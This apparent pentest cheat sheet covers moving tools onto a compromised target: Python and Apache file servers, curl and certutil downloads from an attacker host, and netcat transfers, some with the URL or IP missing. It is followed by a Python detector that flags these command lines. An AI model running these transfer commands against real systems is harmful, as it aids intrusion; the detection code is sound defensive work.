File transfers

Once we gain initial access to our target we may need to upload additional tools to help us elevate privileges or provide easier methods of accessing the machine at a later point. We might also want to download files from the target for use in our report. The following list provides a few common techniques for executing file transfers.

Hosting files via HTTP

On our attacking machine we have two options for serving files. The first (preferred) method is to run Python's built-in HTTP server module (http.server in Python 3, SimpleHTTPServer in Python 2) in the directory that contains the files we want to transfer.
python3 -m http.server 80
python -m SimpleHTTPServer 80
Our second option is to use our built-in Apache server. To do this we need to start the Apache 2 service. Once started, our files will be served from /var/www/html.
systemctl start apache2
Next, we use our target machine to request the desired file from the server. The method varies slightly depending on the OS of the target machine.

Built-in OS functions


wget -O report_wget.pdf
-O saves the file with a different name on the local machine
curl -o file.pdf http://attackerip/file.pdf
axel -a -n 20 -o report_axel.pdf
-n specifies the number of connections
-a provides a more concise progress indicator
-o specifies a different name for the downloaded file


certutil -urlcache -f http://sourceip/file.exe [c:\desired_destination\desired_]name.exe

Other alternatives


Create an FTP server in the directory you are in, on port 21, allow anonymous access:
python -m pyftpdlib -p 21
ftp $IPaddressofattacker


On receiving machine: nc -nlvp 4444 > incoming.exe
On sending machine: nc -nv 4444 < file.exe
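
Each of the transfer commands above leaves a recognisable process command line on the host that runs it. The following is an added example, not part of the original page: a small Python matcher that flags those command lines in process-creation logs. The rule names, the SAMPLE_EVENTS lines and the 192.0.2.10 address are constructed for illustration.

```python
import re

# Rules keyed to the transfer commands listed on this page.
# Rule names are hypothetical labels chosen for this example.
RULES = [
    ("certutil_urlcache_download",
     re.compile(r"\bcertutil(\.exe)?\b.*[-/]urlcache\b.*\bhttps?://", re.I)),
    ("python_adhoc_http_server",
     re.compile(r"\bpython[\d.]*\b.*\s-m\s+(http\.server|SimpleHTTPServer)\b", re.I)),
    ("python_adhoc_ftp_server",
     re.compile(r"\bpython[\d.]*\b.*\s-m\s+pyftpdlib\b", re.I)),
    # Low-signal on its own: saving a download under a chosen name is common.
    ("downloader_to_named_file",
     re.compile(r"^\S*\b(wget|curl|axel)\b.*\s-o\s+\S+", re.I)),
]

def is_nc_listener(cmdline):
    """True when the process is netcat started with a listen flag (e.g. -nlvp)."""
    tokens = cmdline.split()
    if not tokens:
        return False
    binary = tokens[0].replace("\\", "/").rsplit("/", 1)[-1]
    if not re.fullmatch(r"(nc|ncat|netcat)(\.exe)?", binary, re.I):
        return False
    return any(re.fullmatch(r"-[a-zA-Z]*l[a-zA-Z]*", t) for t in tokens[1:])

def classify(cmdline):
    """Return the names of all rules that match one command line."""
    hits = [name for name, rx in RULES if rx.search(cmdline)]
    if is_nc_listener(cmdline):
        hits.append("netcat_listener")
    return hits

def scan(events):
    """Map each flagged command line to the rules it matched."""
    return {e: classify(e) for e in events if classify(e)}

# Constructed sample of process-creation command lines (last three are benign).
SAMPLE_EVENTS = [
    "certutil -urlcache -f http://192.0.2.10/file.exe c:\\temp\\name.exe",
    "python3 -m http.server 80",
    "python -m SimpleHTTPServer 80",
    "python -m pyftpdlib -p 21",
    "nc -nlvp 4444",
    "curl -o file.pdf http://192.0.2.10/file.pdf",
    "certutil -verify cert.cer",
    "python3 manage.py runserver",
    "nc -nv 192.0.2.10 4444",
]

if __name__ == "__main__":
    for cmd, rules in scan(SAMPLE_EVENTS).items():
        print(f"{', '.join(rules):32} {cmd}")
```

Shell redirections such as "> incoming.exe" are handled by the shell and do not appear in the netcat process arguments, so the listener rule keys on the listen flag instead.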